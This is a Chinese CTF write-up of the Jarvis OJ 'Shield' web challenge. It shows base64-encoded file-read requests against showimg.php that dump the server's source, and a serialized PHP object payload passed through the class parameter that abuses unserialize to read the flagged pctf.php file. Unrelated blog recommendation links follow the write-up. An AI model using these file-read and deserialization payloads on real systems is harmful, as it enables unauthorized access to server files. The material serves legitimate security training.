题目地址

http://web.jarvisoj.com:32768/

首页是一张图片

查看源码,看到了一些猫腻,showing.php     c2hpZWxkLmpwZw==是base64编码    解码成shield.jpg

我们尝试输入一下,得到了一堆乱码,可以确定是一个文件包含漏洞,可以任意读取服务器文件,文件名用base64加密

尝试读取一下shield.php(c2hpZWxkLnBocA==)

view-source:http://web.jarvisoj.com:32768/showimg.php?img=c2hvd2ltZy5waHA=
<?php

    $f = $_GET['img'];

    if (!empty($f)) {

        $f = base64_decode($f);

        if (stripos($f,'..')===FALSE && stripos($f,'/')===FALSE && stripos($f,'\\')===FALSE

        && stripos($f,'pctf')===FALSE) {

            readfile($f);

        } else {

            echo "File not found!";

        }

    }

?>

过滤了切换目录的字符和pctf

之后我们尝试获取index.php的页面   index.php(aW5kZXgucGhw)





view-source:http://web.jarvisoj.com:32768/showimg.php?img=aW5kZXgucGhw






<?php

    require_once('shield.php');

    $x = new Shield();

    isset($_GET['class']) && $g = $_GET['class'];

    if (!empty($g)) {

        $x = unserialize($g);

    }

    echo $x->readfile();

?>




包含shield.php,可以通过get传参的方式,new 一个shield类,然后进行反序列化,那就读取一下shield.php(c2hpZWxkLnBocA==)的内容




http://web.jarvisoj.com:32768/showimg.php?img=c2hpZWxkLnBocA==






<?php

    //flag is in pctf.php

    class Shield {

        public $file;

        function __construct($filename = '') {

            $this -> file = $filename;

        }

        function readfile() {

            if (!empty($this->file) && stripos($this->file,'..')===FALSE

            && stripos($this->file,'/')===FALSE && stripos($this->file,'\\')==FALSE) {

                return @file_get_contents($this->file);

            }

        }

    }

?>




得到了shield的类的构造函数和方法,还有提示flag在pctf.php   那读取一下pctf.php(cGN0Zi5waHA=)




http://web.jarvisoj.com:32768/showimg.php?img=cGN0Zi5waHA=






没有找到文件,前面过滤掉了pctf,所以不能直接利用,但是定义shield类里面没有进行过滤,我们利用反序列化漏洞,构造一个shield类,且属性file为pctf.php


把上面的序列化代码复制下来,本地跑一下




<?php

    class Shield {

        public $file;

        function __construct($filename = '') {

            $this -> file = $filename;

        }

        function readfile() {

            if (!empty($this->file) && stripos($this->file,'..')===FALSE

            && stripos($this->file,'/')===FALSE && stripos($this->file,'\\')==FALSE) {

                return @file_get_contents($this->file);

            }

        }

    }

     $shield = new Shield('pctf.php');

    echo serialize($shield);

?>





得到本地的结果




然后输入最后的payload




http://web.jarvisoj.com:32768/?class=O:6:%22Shield%22:1:{s:4:%22file%22;s:8:%22pctf.php%22;}




因为是被注释的,只能查看源码F12才能找到flag




考察点


文件包含漏洞


反序列化漏洞
												


											
web-神盾局的秘密的更多相关文章
	

    
						
  1. jarvis OJ WEB题目writeup
		
    0x00前言 发现一个很好的ctf平台,题目感觉很有趣,学习了一波并记录一下 https://www.jarvisoj.com 0x01 Port51 题目要求是用51端口去访问该网页,注意下,要用具 ...
    
		
    2. 
						
  2. JarvisOJ平台Web题部分writeup
		
    PORT51 题目链接:http://web.jarvisoj.com:32770/ 这道题本来以为是访问服务器的51号端口,但是想想又不太对,应该是本地的51号端口访问服务器 想着用linux下的c ...
    
		
    3. 
						
  3. 【web  JSP  basePath】basePath的含义
		
    问题1:WEB-INF的问题 今天新创建项目,在JSP中引入外部的JS文件和CSS文件,但是路径一直显示错误: 其中JSP页面引入这几个文件是这么写的: <link rel="styl ...
    
		
    4. 
						
  4. PCTF-2016-WEB
		
    Pctf ** web100 PORT51**  开始看到这个真的无法下手,想过用python–socket编程或者scapy发包.自己觉得是可以的,但是没有去试,后面看一大神writeup,知道:  ...
    
		
    5. 
						
  5. PHP反序列化漏洞研究
		
    序列化 序列化说通俗点就是把一个对象变成可以传输的字符串 php serialize()函数 用于序列化对象或数组,并返回一个字符串.序列化对象后,可以很方便的将它传递给其他需要它的地方,且其类型和结 ...
    
		
    6. 
						
  6. C# (转载)webbrowser专题(参考资料:https://www.cnblogs.com/blogpro/p/11458390.html)
		
    C# .Net 2.0实例学习:WebBrowser页面与WinForm交互技巧 2 Study Case :高亮显示 上一个例子中我们学会了查找文本——究跟到底,对Web页面还是只读不写.那么,如果 ...
    
		
    7. 
						
  7. C# webbrowser专题
		
    C# .Net 2.0实例学习:WebBrowser页面与WinForm交互技巧 2 Study Case :高亮显示 上一个例子中我们学会了查找文本——究跟到底,对Web页面还是只读不写.那么,如果 ...
    
		
    8. 
						
  8. Spring Boot的前世今生以及它和Spring Cloud的关系详解。
		
    要了解Spring Boot的发展背景,还得从2004年Spring Framework1.0版本发布开始说起,不过大家都是从开始学习Java就使用Spring Framework了,所以就不做过多展 ...
    
		
    9. 
						
  9. 【原】移动web点5像素的秘密
		
    最近和一个朋友聊天,朋友吐露了工作上的一些不开心,说自己总是喜欢跟别人比较,活得比较累,这种感觉大部分人经历过,往往觉得是自己心态不好,其实不然,这是人性,此时应该快速摆脱这种状态,想到DOTA大9神 ...
    
		
    10. 
						
  10. 移动web点5像素的秘密
		
    最近和一个朋友聊天,朋友吐露了工作上的一些不开心,说自己总是喜欢跟别人比较,活得比较累,这种感觉大部分人经历过,往往觉得是自己心态不好,其实不然,这是人性,此时应该快速摆脱这种状态,想到DOTA大9神 ...
    
		
    11. 
		

	


随机推荐
	

    
									
  1. AtCoder Regular Contest 100
			
    传送门 C - Linear Approximation 题意: 求 \[ \sum_{i=1}^nabs(A_i-(b+i)) \] \(A_i,b\)给出. 思路: 将括号拆开,变为\(A_i-i ...
    
			
    2. 
						
  2. ClickHouse
			
    ClickHouse 是俄罗斯的Yandex于2016年开源的列式存储数据库(DBMS),主要用于在线分析处理查询(OLAP),能够使用SQL查询实时生成分析数据报告 1 安装前的准备1.1 Cent ...
    
			
    3. 
						
  3. 2019csp-s
			
    11.17一切尘埃落定 回来之后一直“沉迷”文化课,不想去面对自己,更多的可能是不敢吧 晃晃悠悠一个星期过去了 其实信息学考完就知道成绩了,很垃圾,不想去想,所以沉迷解析几何无法自拔(但好像也做不对几 ...
    
			
    4. 
						
  4. golang数据结构之快速排序
			
    具体过程:黑色标记代表左指针,红色标记代表右指针,蓝色标记代表中间值.(依次从左往向下) //QuickSort 快速排序 func QuickSort(left ]int) { l := left  ...
    
			
    5. 
						
  5. angularjs ng-if妙用,ng-if解决父子组件异步传值
			
     壹 ❀ 引 angularjs开发中,组件件相互通信传值是再普遍不过的操作了,比如我在父作用域中获取了一个数据,想要传递给子组件使用,做简单的做法就是通过scope传递,比如这样: <body ...
    
			
    6. 
						
  6. 为什么不允许使用 Java 静态构造函数?
			
    不允许使用 Java 静态构造函数,但是为什么呢?在深入探讨不允许使用静态构造函数的原因之前,让我们看看如果要使 构造函数静态化 会发生什么. Java 静态构造函数 假设我们有一个定义为的类: pu ...
    
			
    7. 
						
  7. Unity 利用Cinemachine快速创建灵活的相机系统
			
    在第一或第三人称ACT和FPS游戏中,相机的运动需求是多种多样的,Unity内置的Cinemachine包可以助你快速实现不同相机功能,例如范围追踪,边界设置等. 例如,考虑这样一个功能,这在很多游戏 ...
    
			
    8. 
						
  8. Kubernetes之Pod使用
			
    一.什么是Podkubernetes中的一切都可以理解为是一种资源对象,pod,rc,service,都可以理解是 一种资源对象.pod的组成示意图如下,由一个叫”pause“的根容器,加上一个或多个 ...
    
			
    9. 
						
  9. 正则表达式中的.*?和python中re.S参数的详解
			
    本章的内容主要是为讲解在正则表达式中常用的.*?和re.S! 在正则表达式中有贪婪匹配和最小匹配:如下为贪婪匹配(.*) import re match = re.search(r'PY.*', 'P ...
    
			
    10. 
						
  10. Linux中的buff/cache内存
			
    我们用free.top等相关能够查询到当前内存的使用情况的命令时,总会有一个buff/cache让我们很困惑. buffer 即写如磁盘时,先保存到磁盘缓冲区(buffer),然后再写入到磁盘. ca ...
    
			
    11.